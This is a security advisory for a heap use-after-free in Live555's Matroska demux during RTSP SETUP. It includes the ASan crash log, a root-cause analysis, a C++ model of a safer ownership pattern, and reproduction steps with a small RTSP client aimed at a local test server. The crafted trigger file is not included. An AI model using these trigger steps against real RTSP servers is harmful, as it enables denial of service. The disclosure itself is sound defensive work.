Heap Use-After-Free in Live555 (Matroska Demux during SETUP) 2019.08.16
Nov 18, 2025, 21:51 updated

Bug Author: Heng Zhang

Affected Version: Live555 Streaming Media 2018.9.2 (liveMedia)

Vendor: Live Networks (Live555); source built from the GitHub mirror referenced in the Proof of Concept

Software: Live555 Streaming Media / testOnDemandRTSPServer

Vulnerability Files:

  • liveMedia/MatroskaFile.cpp (MatroskaDemux allocation/usage)
  • liveMedia/MatroskaFileServerMediaSubsession.cpp (creates per-track sources from the demux)
  • liveMedia/include/Media.hh (access to Medium::envir() on a freed object)
  • liveMedia/Media.cpp (MediaLookupTable::remove deletes Medium instances)
  • (Trigger path) liveMedia/RTSPServer.cpp, liveMedia/OnDemandServerMediaSubsession.cpp, liveMedia/GenericMediaServer.cpp


Description

  1. Use-After-Free when creating a Matroska demuxed track (SETUP)

During RTSP SETUP for a Matroska (.mkv) stream, MatroskaFileServerMediaSubsession::createNewStreamSource() requests a demuxed track from MatroskaDemux. Inside MatroskaDemux::newDemuxedTrackByTrackNumber(), the code constructs a MatroskaDemuxedTrack using envir() from the demux (Medium::envir()).

A crafted test.mkv triggers a lifetime mismatch: the MatroskaDemux object has already been removed from MediaLookupTable and deleted (via MediaLookupTable::remove()), yet the subsession still holds a raw pointer to it and uses that pointer to create a new track. The call to Medium::envir() therefore reads a member of the freed MatroskaDemux instance, which AddressSanitizer reports as a heap-use-after-free and the process aborts.

  2. Execution Flow Leading to Crash (SETUP path)

RTSPServer::RTSPClientConnection::handleRequestBytes()
  -> RTSPServer::RTSPClientSession::handleCmd_SETUP()
  -> OnDemandServerMediaSubsession::getStreamParameters()
  -> MatroskaFileServerMediaSubsession::createNewStreamSource()
  -> MatroskaDemux::newDemuxedTrackByTrackNumber()
  -> Medium::envir()  (UAF on freed MatroskaDemux)

  3. Crash Evidence (ASan Log, abridged; the full report is in the Proof of Concept section)
==12788==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000000028
READ of size 8 at 0x608000000028 thread T0
#0 0x61b96f in Medium::envir() const liveMedia/include/Media.hh:59:43
#1 0x61b96f in MatroskaDemux::newDemuxedTrackByTrackNumber(unsigned) liveMedia/MatroskaFile.cpp:727:56
#2 0x54d1d9 in MatroskaFileServerMediaSubsession::createNewStreamSource(...) liveMedia/MatroskaFileServerMediaSubsession.cpp:53:40
#3 0x60bb69 in OnDemandServerMediaSubsession::getStreamParameters(...) liveMedia/OnDemandServerMediaSubsession.cpp:114:9
#4 0x4ded5f in RTSPServer::RTSPClientSession::handleCmd_SETUP(...) liveMedia/RTSPServer.cpp:1405:17
#5 0x4dade6 in RTSPServer::RTSPClientConnection::handleRequestBytes(int) liveMedia/RTSPServer.cpp:782:19
...
0x608000000028 is located 8 bytes inside of 88-byte region [0x608000000020,0x608000000078)
freed by thread T0 here:
#0 0x4c530d in operator delete(void*)
#1 0x557c74 in MediaLookupTable::remove(char const*) liveMedia/Media.cpp:147:5
previously allocated by thread T0 here:
#0 0x4c4aad in operator new(unsigned long)
#1 0x613545 in MatroskaFile::newDemux() liveMedia/MatroskaFile.cpp:231:26
SUMMARY: AddressSanitizer: heap-use-after-free in Medium::envir() const
  4. Root Cause
  • The MatroskaDemux object is managed as a Medium and can be deleted by MediaLookupTable::remove() while other code (here the MatroskaFileServerMediaSubsession) still holds raw pointers to it. Nothing invalidates those pointers when the table entry is removed.
  • After deletion, subsequent SETUP handling continues to use the freed MatroskaDemux pointer to construct a demuxed track, leading to a dereference of freed memory in Medium::envir().
  • The "freed by" stack in the ASan report ends at MediaLookupTable::remove(); the report as captured does not show which caller removed the demux, so the exact code path that deletes it early is not identified here.
  5. Impact
  • Denial of Service: crash of the RTSP server during SETUP for Matroska streams.
  • Potential Memory Safety Risk: the stale read could, in principle, be turned into memory corruption beyond a crash, depending on allocator layout and surrounding heap state. Without AddressSanitizer the read in Medium::envir() need not fault immediately; it may return a stale UsageEnvironment reference and fail later, so the crash seen in testing is the detectable outcome, not the only one.
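The ownership pattern behind this bug, reduced to a small model in C++. This is an added example, not Live555 code: the Registry/Demux/Track names, the Environment type and the weak_ptr re-validation in the hardened registry are illustrative assumptions, not the project's own fix. The unsafe registry deletes by name and leaves outstanding raw pointers dangling, which is the shape of MediaLookupTable::remove(); the hardened registry hands consumers a weak_ptr, so a track request after removal fails closed instead of dereferencing freed memory.

```cpp
// Added example modelling the lifetime bug, not Live555 code. All names here
// (Environment, Demux, Track, RawRegistry, SafeRegistry) are invented for
// illustration.
#include <map>
#include <memory>
#include <string>
#include <vector>

// Stands in for UsageEnvironment: a track reaches it through its parent demux.
struct Environment {
  std::vector<std::string> log;
};

struct Demux {
  Environment& env;
  std::string name;
  Demux(Environment& e, std::string n) : env(e), name(std::move(n)) {}
  Environment& envir() const { return env; }   // the accessor that faulted in the report
};

struct Track {
  unsigned number;
  std::string demuxName;
};

// Unsafe pattern: the registry owns the objects and deletes them by name,
// while other code keeps raw Demux* that nothing invalidates. A consumer that
// calls envir() through such a pointer after remove() reads freed memory.
class RawRegistry {
 public:
  Demux* add(Environment& env, const std::string& name) {
    Demux* d = new Demux(env, name);
    table_[name] = d;
    return d;                       // caller keeps this raw pointer
  }
  void remove(const std::string& name) {
    auto it = table_.find(name);
    if (it == table_.end()) return;
    delete it->second;              // every outstanding raw pointer is now dangling
    table_.erase(it);
  }
  ~RawRegistry() { for (auto& kv : table_) delete kv.second; }
 private:
  std::map<std::string, Demux*> table_;
};

// Hardened pattern: the registry holds shared ownership and consumers hold a
// weak_ptr that must be re-validated before every use. After remove(), lock()
// yields null and the caller refuses rather than touching freed memory.
class SafeRegistry {
 public:
  std::weak_ptr<Demux> add(Environment& env, const std::string& name) {
    auto d = std::make_shared<Demux>(env, name);
    table_[name] = d;
    return d;
  }
  void remove(const std::string& name) { table_.erase(name); }
 private:
  std::map<std::string, std::shared_ptr<Demux>> table_;
};

// Equivalent of "create a demuxed track from the demux": returns nullptr when
// the demux has already been removed from the registry.
std::unique_ptr<Track> newTrackSafe(const std::weak_ptr<Demux>& weak, unsigned number) {
  std::shared_ptr<Demux> demux = weak.lock();
  if (!demux) return nullptr;       // demux gone: fail closed, do not crash
  demux->envir().log.push_back("track " + std::to_string(number));
  return std::unique_ptr<Track>(new Track{number, demux->name});
}

// Normal path: a live demux yields a track carrying the requested number.
unsigned trackNumberWhileDemuxAlive() {
  Environment env;
  SafeRegistry reg;
  std::weak_ptr<Demux> handle = reg.add(env, "matroskaFileTest");
  std::unique_ptr<Track> t = newTrackSafe(handle, 3);
  return t ? t->number : 0;
}

// Crash path from the advisory, replayed against the hardened registry: create
// the demux, remove it (as MediaLookupTable::remove would), then attempt the
// track creation that faulted in the vulnerable build. Returns true when the
// pre-removal request succeeds and the post-removal request is rejected.
bool trackCreationAfterRemoveIsRejected() {
  Environment env;
  SafeRegistry reg;
  std::weak_ptr<Demux> handle = reg.add(env, "matroskaFileTest");
  bool before = newTrackSafe(handle, 1) != nullptr;
  reg.remove("matroskaFileTest");
  bool after = newTrackSafe(handle, 1) != nullptr;
  return before && !after;
}
```

The point of the model is the check in newTrackSafe(): the consumer never assumes the demux outlives its own pointer. In the real code base the equivalent fix is whatever makes the subsession's demux pointer unusable once MediaLookupTable::remove() has deleted the object; the weak_ptr form is one way to express that invariant, not a description of Live555's actual change.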


Proof of Concept

  1. Setup

The following steps detail the setup process for building the Live555 Streaming Media library and the required demo program.

Clone the Live555 source repository:

git clone https://github.com/rgaufman/live555.git

Navigate into the directory and check out the commit corresponding to version 2018.09.02:

git checkout ceeb4f4

Build the Live555 Streaming Media libraries and the demo programs with AddressSanitizer enabled: add -fsanitize=address (with -g for symbolised stack traces) to both the compiler and the linker flags. Confirm that the demo program testOnDemandRTSPServer is produced as an output binary.

  2. Resources
  • Place a crafted Matroska file named test.mkv in the working directory used by the matroskaFileTest stream.
  3. Trigger

Start the server:

./testProgs/testOnDemandRTSPServer 8554

From an RTSP client, issue the usual control sequence against the Matroska stream. Only the request lines are shown; a real client also sends a CSeq header on every request and a Transport header on SETUP. The crash occurs while the server handles SETUP:

DESCRIBE rtsp://127.0.0.1:8554/matroskaFileTest RTSP/1.0
SETUP rtsp://127.0.0.1:8554/matroskaFileTest/track1 RTSP/1.0
PLAY rtsp://127.0.0.1:8554/matroskaFileTest/ RTSP/1.0

With the crafted test.mkv in place, the process terminates with the AddressSanitizer heap-use-after-free report above.
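A minimal RTSP client that drives the sequence above, added here as an example (it is not part of the advisory or of Live555). It performs DESCRIBE, reads the per-track a=control: values from the returned SDP, sends a complete SETUP for the first track with CSeq and Transport headers, and reports whether the server answered or dropped the connection while handling SETUP. The host, port, client_port range and the a=control: parsing are assumptions about a standard Live555 SDP; the ASan report itself appears on the server side.

```cpp
// Added example: a small POSIX RTSP client for reproducing the SETUP trigger.
// Not Live555 code. Host/port/client_port values are assumptions.
#include <arpa/inet.h>
#include <cstdint>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <netinet/in.h>
#include <string>
#include <sys/socket.h>
#include <unistd.h>
#include <vector>

// Build a complete RTSP/1.0 request. A conforming request always carries CSeq;
// extraHeaders supplies e.g. Accept for DESCRIBE or Transport for SETUP.
std::string buildRequest(const std::string& method, const std::string& url,
                         unsigned cseq, const std::string& extraHeaders = "") {
  return method + " " + url + " RTSP/1.0\r\nCSeq: " + std::to_string(cseq) +
         "\r\n" + extraHeaders + "\r\n";
}

// Numeric status of an RTSP response, or -1 when the data is not a parseable
// status line (empty read after a reset, or non-RTSP bytes).
int parseStatusCode(const std::string& response) {
  if (response.size() < 12 || response.compare(0, 9, "RTSP/1.0 ") != 0) return -1;
  const char* start = response.c_str() + 9;
  char* end = nullptr;
  long code = std::strtol(start, &end, 10);
  if (end == start) return -1;
  return static_cast<int>(code);
}

// Every per-track "a=control:" value in the SDP body of a DESCRIBE response.
// The session-level "a=control:*" is skipped; the rest (e.g. "track1") are the
// relative URLs the client appends to the stream URL for SETUP.
std::vector<std::string> parseTrackControls(const std::string& response) {
  std::vector<std::string> controls;
  const std::string key = "a=control:";
  size_t pos = 0;
  while ((pos = response.find(key, pos)) != std::string::npos) {
    pos += key.size();
    size_t eol = response.find_first_of("\r\n", pos);
    std::string value = response.substr(pos, eol == std::string::npos ? std::string::npos : eol - pos);
    if (value != "*") controls.push_back(value);
  }
  return controls;
}

// Send one request and read one response; "" means the peer closed or reset.
static std::string exchange(int fd, const std::string& req) {
  if (send(fd, req.data(), req.size(), 0) < 0) return "";
  char buf[8192];
  ssize_t n = recv(fd, buf, sizeof buf - 1, 0);
  if (n <= 0) return "";
  return std::string(buf, static_cast<size_t>(n));
}

int main(int argc, char** argv) {
  const char* host = argc > 1 ? argv[1] : "127.0.0.1";   // assumed local server
  int port = argc > 2 ? std::atoi(argv[2]) : 8554;
  std::string base = std::string("rtsp://") + host + ":" + std::to_string(port) + "/matroskaFileTest";

  int fd = socket(AF_INET, SOCK_STREAM, 0);
  sockaddr_in addr{};
  addr.sin_family = AF_INET;
  addr.sin_port = htons(static_cast<uint16_t>(port));
  if (fd < 0 || inet_pton(AF_INET, host, &addr.sin_addr) != 1 ||
      connect(fd, reinterpret_cast<sockaddr*>(&addr), sizeof addr) != 0) {
    std::perror("connect");
    return 1;
  }

  std::string describe = exchange(fd, buildRequest("DESCRIBE", base, 1, "Accept: application/sdp\r\n"));
  if (parseStatusCode(describe) != 200) { std::printf("DESCRIBE failed\n"); close(fd); return 1; }
  std::vector<std::string> tracks = parseTrackControls(describe);
  if (tracks.empty()) { std::printf("no per-track a=control lines in SDP\n"); close(fd); return 1; }

  // SETUP for the first track; client_port range is an arbitrary assumption.
  std::string setup = exchange(fd, buildRequest("SETUP", base + "/" + tracks[0], 2,
      "Transport: RTP/AVP;unicast;client_port=50000-50001\r\n"));
  if (setup.empty()) std::printf("server closed the connection during SETUP (crash suspected)\n");
  else std::printf("SETUP %s -> %d\n", tracks[0].c_str(), parseStatusCode(setup));
  close(fd);
  return 0;
}
```

Run it against the ASan-instrumented server started as above; a clean build answers SETUP with 200, while the crafted test.mkv makes the server abort during SETUP and the client sees the connection close. Only the first recv() per request is read, which is enough for the short DESCRIBE and SETUP responses this stream produces; a general client would loop until the Content-Length body is complete.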

  4. ASan report (full)
==12788==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000000028 at pc 0x00000061b970 bp 0x7ffe6d681820 sp 0x7ffe6d681818
READ of size 8 at 0x608000000028 thread T0
#0 0x61b96f in Medium::envir() const /home/ubuntu/experiments/live555/liveMedia/include/Media.hh:59:43
#1 0x61b96f in MatroskaDemux::newDemuxedTrackByTrackNumber(unsigned int) /home/ubuntu/experiments/live555/liveMedia/MatroskaFile.cpp:727:56
#2 0x54d1d9 in MatroskaFileServerMediaSubsession::createNewStreamSource(unsigned int, unsigned int&) /home/ubuntu/experiments/live555/liveMedia/MatroskaFileServerMediaSubsession.cpp:53:40
#3 0x60bb69 in OnDemandServerMediaSubsession::getStreamParameters(unsigned int, unsigned int, Port const&, Port const&, int, unsigned char, unsigned char, unsigned int&, unsigned char&, unsigned char&, Port&, Port&, void*&) /home/ubuntu/experiments/live555/liveMedia/OnDemandServerMediaSubsession.cpp:114:9
#4 0x4ded5f in RTSPServer::RTSPClientSession::handleCmd_SETUP(RTSPServer::RTSPClientConnection*, char const*, char const*, char const*) /home/ubuntu/experiments/live555/liveMedia/RTSPServer.cpp:1405:17
#5 0x4dade6 in RTSPServer::RTSPClientConnection::handleRequestBytes(int) /home/ubuntu/experiments/live555/liveMedia/RTSPServer.cpp:782:19
#6 0x4ce3fe in GenericMediaServer::ClientConnection::incomingRequestHandler() /home/ubuntu/experiments/live555/liveMedia/GenericMediaServer.cpp:246:3
#7 0x4ce3fe in GenericMediaServer::ClientConnection::incomingRequestHandler(void*, int) /home/ubuntu/experiments/live555/liveMedia/GenericMediaServer.cpp:239:15
#8 0x66cbe8 in BasicTaskScheduler::SingleStep(unsigned int) /home/ubuntu/experiments/live555/BasicUsageEnvironment/BasicTaskScheduler.cpp:153:7
#9 0x6758fa in BasicTaskScheduler0::doEventLoop(char volatile*) /home/ubuntu/experiments/live555/BasicUsageEnvironment/BasicTaskScheduler0.cpp:80:5
#10 0x4c8b93 in main /home/ubuntu/experiments/live555/testProgs/testOnDemandRTSPServer.cpp:442:24
#11 0x7fa6a4770082 in __libc_start_main /build/glibc-LcI20x/glibc-2.31/csu/../csu/libc-start.c:308:16
#12 0x41cbfd in _start (/home/ubuntu/experiments/live555/testProgs/testOnDemandRTSPServer+0x41cbfd)

0x608000000028 is located 8 bytes inside of 88-byte region [0x608000000020,0x608000000078)
freed by thread T0 here:
#0 0x4c530d in operator delete(void*) (/home/ubuntu/experiments/live555/testProgs/testOnDemandRTSPServer+0x4c530d)
#1 0x557c74 in MediaLookupTable::remove(char const*) /home/ubuntu/experiments/live555/liveMedia/Media.cpp:147:5

previously allocated by thread T0 here:
#0 0x4c4aad in operator new(unsigned long) (/home/ubuntu/experiments/live555/testProgs/testOnDemandRTSPServer+0x4c4aad)
#1 0x613545 in MatroskaFile::newDemux() /home/ubuntu/experiments/live555/liveMedia/MatroskaFile.cpp:231:26

SUMMARY: AddressSanitizer: heap-use-after-free /home/ubuntu/experiments/live555/liveMedia/include/Media.hh:59:43 in Medium::envir() const
Shadow bytes around the buggy address:
0x0c107fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c107fff8000: fa fa fa fa fd[fd]fd fd fd fd fd fd fd fd fd fa
0x0c107fff8010: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==12788==ABORTING


Technical Details (Code Locations)

  • UAF dereference: liveMedia/include/Media.hh:59 (UsageEnvironment& Medium::envir() const)
  • Where the stale demux pointer is used: liveMedia/MatroskaFile.cpp:724–730 (MatroskaDemux::newDemuxedTrackByTrackNumber)
  • Demux creation site: liveMedia/MatroskaFile.cpp:230–235 (MatroskaFile::newDemux)
  • Deletion site: liveMedia/Media.cpp:135–149 (MediaLookupTable::remove deletes the Medium)
  • SETUP call path: RTSPServer::RTSPClientSession::handleCmd_SETUP -> OnDemandServerMediaSubsession::getStreamParameters -> MatroskaFileServerMediaSubsession::createNewStreamSource -> MatroskaDemux::newDemuxedTrackByTrackNumber (UAF)


Vulnerability Class

Type: Use-After-Free (dangling pointer dereference)

Impact: Denial of Service; potential memory corruption

Trigger: Crafted Matroska file (test.mkv) causing premature demux deletion while a stale pointer remains in use

